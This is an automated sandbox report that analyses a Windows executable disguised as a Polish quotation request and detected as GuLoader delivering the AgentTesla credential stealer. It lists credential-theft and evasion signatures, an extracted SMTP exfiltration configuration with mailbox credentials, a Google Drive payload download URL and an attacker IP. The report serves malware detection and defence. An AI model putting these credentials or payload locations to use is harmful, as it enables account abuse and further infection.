Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe

Overview

General Information

Sample Name:Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe
Analysis ID:1383
MD5:419a3e9ce6606d5ed7b22a7574e1a294
SHA1:7c08e8f1f4f478df9baf5d00675bd174467621bc
SHA256:3ebfb7cdc30291bcc995951dda1d8f62cea3e0beb990e35fabb3078b6d9d9921
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe (PID: 8728 cmdline: 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' MD5: 419A3E9CE6606D5ED7B22A7574E1A294)
    • RegAsm.exe (PID: 8100 cmdline: 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 8676 cmdline: 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 9020 cmdline: 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 9012 cmdline: 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comvirwuh@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.1080090056.0000000002250000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 9012JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 9012JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 109.169.39.245, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 9012, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49748

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.9012.16.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comvirwuh@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeVirustotal: Detection: 32%Perma Link
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeReversingLabs: Detection: 59%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011C6AC0 CryptUnprotectData,16_2_011C6AC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011C7211 CryptUnprotectData,16_2_011C7211
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49727 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 109.169.39.245 109.169.39.245
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2pc77l1m3ao72uchj4vo9g7ss2/1632826875000/00519186742208262786/*/13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-50-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49748 -> 109.169.39.245:587
            Source: global trafficTCP traffic: 192.168.11.20:49748 -> 109.169.39.245:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 00000010.00000002.5634097165.00000000012F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: RegAsm.exe, 00000010.00000002.5634097165.00000000012F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000003.1969551904.0000000001381000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000002.5655175240.000000001E060000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000002.5655609885.000000001E08E000.00000004.00000001.sdmpString found in binary or memory: http://isQqqrU1x3qSl4S.net
            Source: RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpString found in binary or memory: http://mail.reyesyasociados.com
            Source: RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpString found in binary or memory: http://omoYjp.com
            Source: RegAsm.exe, 00000010.00000003.1053028532.0000000001334000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000010.00000002.5633250471.00000000012CE000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-50-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000010.00000003.1057519355.000000000134A000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000003.1053028532.0000000001334000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2p
            Source: RegAsm.exe, 00000010.00000002.5631737424.0000000001288000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000010.00000002.5631737424.0000000001288000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/OxH
            Source: RegAsm.exe, 00000010.00000003.1056702167.00000000012FC000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g
            Source: RegAsm.exe, 00000010.00000003.1056702167.00000000012FC000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8gE
            Source: RegAsm.exe, 00000010.00000002.5627003860.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8gwininet.dllMozilla/5
            Source: RegAsm.exe, 00000010.00000002.5631737424.0000000001288000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8gzgV
            Source: RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2pc77l1m3ao72uchj4vo9g7ss2/1632826875000/00519186742208262786/*/13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-50-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49727 version: TLS 1.2
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E4113016_2_00E41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E43A5016_2_00E43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E4BA5816_2_00E4BA58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E4432016_2_00E44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E4C7B816_2_00E4C7B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E4370816_2_00E43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E56AC816_2_00E56AC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E5089016_2_00E50890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_01157C9016_2_01157C90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0115BF7816_2_0115BF78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0115AE6816_2_0115AE68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0115651816_2_01156518
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_01151D2816_2_01151D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0115B71016_2_0115B710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011CB5B016_2_011CB5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011CA1D016_2_011CA1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011CE03816_2_011CE038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011C3C6816_2_011C3C68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011CDA2016_2_011CDA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011C2AF016_2_011C2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011C89B816_2_011C89B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011C7E4816_2_011C7E48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D39555016_2_1D395550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D39358816_2_1D393588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D39004016_2_1D390040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D395F6016_2_1D395F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D39A51016_2_1D39A510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D39003F16_2_1D39003F
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSOOTIER.exe vs Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeBinary or memory string: OriginalFilenameSOOTIER.exe vs Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeVirustotal: Detection: 32%
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeReversingLabs: Detection: 59%
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: C:\Users\user\AppData\Local\Temp\~DF68469574045BB466.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@10/1@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000005.00000002.1080090056.0000000002250000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_00405846 push edi; retf 5_2_0040585F
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_00405D7E push edx; iretd 5_2_00405D7F
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_00402B90 push ebx; retf 5_2_00402B96
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_02254672 push ds; iretd 5_2_022546C3
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_022546F2 push ds; iretd 5_2_022546C3
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_022506CA push 00000060h; ret 5_2_022506CD
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_02256314 push eax; iretd 5_2_02256363
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_022505C9 push ecx; retf 5_2_022505D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E45EE9 push ebx; iretd 16_2_00E45EF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_011CCE60 push 796C0114h; iretd 16_2_011CD1C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D395500 push edi; iretd 16_2_1D39554E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1D394438 pushfd ; ret 16_2_1D395419
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exe
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exe
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exe
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exe
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exeJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exeJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exeJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile created: \zapytanie ofertowe (shelmo sp. z o.o. 09272021).exeJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
